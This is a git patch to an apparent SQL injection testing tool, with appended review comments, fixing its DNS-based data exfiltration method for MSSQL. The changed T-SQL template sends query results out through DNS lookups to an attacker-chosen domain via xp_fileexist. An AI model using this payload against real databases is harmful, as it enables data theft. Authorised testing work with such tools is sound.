From 5f94987b0f06e2177dab3bc78869356015d2329c Mon Sep 17 00:00:00 2001
From: Miroslav Stampar
Date: Mon, 2 Apr 2012 17:28:18 +0000
Subject: [PATCH] fix for DNS method for MSSQL

---
 lib/techniques/dns/use.py | 7 +------
 procs/mssqlserver/dns_request.txt | 2 +-
 2 files changed, 2 insertions(+), 7 deletions(-)

diff --git a/lib/techniques/dns/use.py b/lib/techniques/dns/use.py
index 4e5870f4c..9ece5cd0f 100644
--- a/lib/techniques/dns/use.py
+++ b/lib/techniques/dns/use.py
@@ -57,12 +57,11 @@ def dnsUse(payload, expression):
     if output is None:
         kb.dnsMode = True
-        pushValue(kb.technique)
         while True:
             count += 1
             prefix, suffix = ("%s" % randomStr(3) for _ in xrange(2))
-            chunk_length = MAX_DNS_LABEL / 2
+            chunk_length = MAX_DNS_LABEL / 2 if Backend.isDbms(DBMS.ORACLE) else MAX_DNS_LABEL / 4 - 2
             _, _, _, _, _, _, fieldToCastStr, _ = agent.getFields(expression)
             nulledCastedField = agent.nullAndCastField(fieldToCastStr)
             nulledCastedField = queries[Backend.getIdentifiedDbms()].substring.query % (nulledCastedField, offset, chunk_length)
@@ -74,9 +73,6 @@ def dnsUse(payload, expression):
             if Backend.isDbms(DBMS.MSSQL):
-                kb.technique = PAYLOAD.TECHNIQUE.STACKED
-                expression = cleanQuery(expression)
-
                 comment = queries[Backend.getIdentifiedDbms()].comment.query
                 query = agent.prefixQuery("; %s" % expressionUnescaped)
                 query = agent.suffixQuery("%s;%s" % (query, comment))
@@ -96,7 +92,6 @@ def dnsUse(payload, expression):
             else:
                 break
-        kb.technique = popValue()
         kb.dnsMode = False
         if output is not None:
diff --git a/procs/mssqlserver/dns_request.txt b/procs/mssqlserver/dns_request.txt
index e4fd978fc..ebeeb4bc1 100644
--- a/procs/mssqlserver/dns_request.txt
+++ b/procs/mssqlserver/dns_request.txt
@@ -1,3 +1,3 @@
 DECLARE @host varchar(1024);
 SELECT @host = '%PREFIX%.' + (%QUERY%) + '.%SUFFIX%' + '.%DOMAIN%';
-EXEC('xp_fileexist "\' + @host + 'c$boot.ini"');
+EXEC('xp_fileexist "\\' + @host + '\c$boot.ini"');
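Review bot: The new `chunk_length` line in the first use.py hunk carries two undocumented budgets — `MAX_DNS_LABEL / 2` for Oracle and `MAX_DNS_LABEL / 4 - 2` for every other backend — and nothing on the line says what the quarter and the `- 2` account for (presumably an encoding step that inflates the chunk before it becomes a DNS label; confirm against the substring/query code), so it needs a why-comment. The value depends only on the identified backend, yet it is recomputed on every pass of `while True:`; hoisting it above the loop together with that comment keeps the loop body to per-chunk work. Since `xrange` on the line above marks this file as Python 2, `/` on an int `MAX_DNS_LABEL` is the floor division the substring query relies on; `//` would state that intent explicitly and keep the same result under Python 3. Proposed, placed before `while True:`: `# per-chunk DNS label budget; non-Oracle backends get a quarter minus 2 -- TODO(review): document why` followed by `chunk_length = MAX_DNS_LABEL // 2 if Backend.isDbms(DBMS.ORACLE) else MAX_DNS_LABEL // 4 - 2`. dnsUse begins before this hunk and continues past it; the two later use.py hunks are pure deletions that pair with the removed `pushValue` here and raise nothing further.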
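Review bot: The corrected `EXEC` line in dns_request.txt works only because T-SQL single-quoted literals give backslash no escape meaning, so `'\\'` is two literal characters and `'\c$boot.ini'` starts with one, and nothing in the template records that; a later editor "normalising" the doubled backslash would silently reintroduce the bug this commit fixes. If the loader that substitutes `%PREFIX%`/`%QUERY%`/`%SUFFIX%`/`%DOMAIN%` passes T-SQL comments through (not visible here), a one-line `-- backslashes are literal inside T-SQL string literals: the \\ and \ on the next line are intentional` above the `EXEC` would protect it; if the loader does not tolerate comments, the same note belongs next to the template's use in use.py. The `@host varchar(1024)` declaration is also far wider than the per-chunk label budget use.py computes as `chunk_length`, which appears to be where the real limit is enforced; a comment saying so would stop a reader from treating 1024 as the bound.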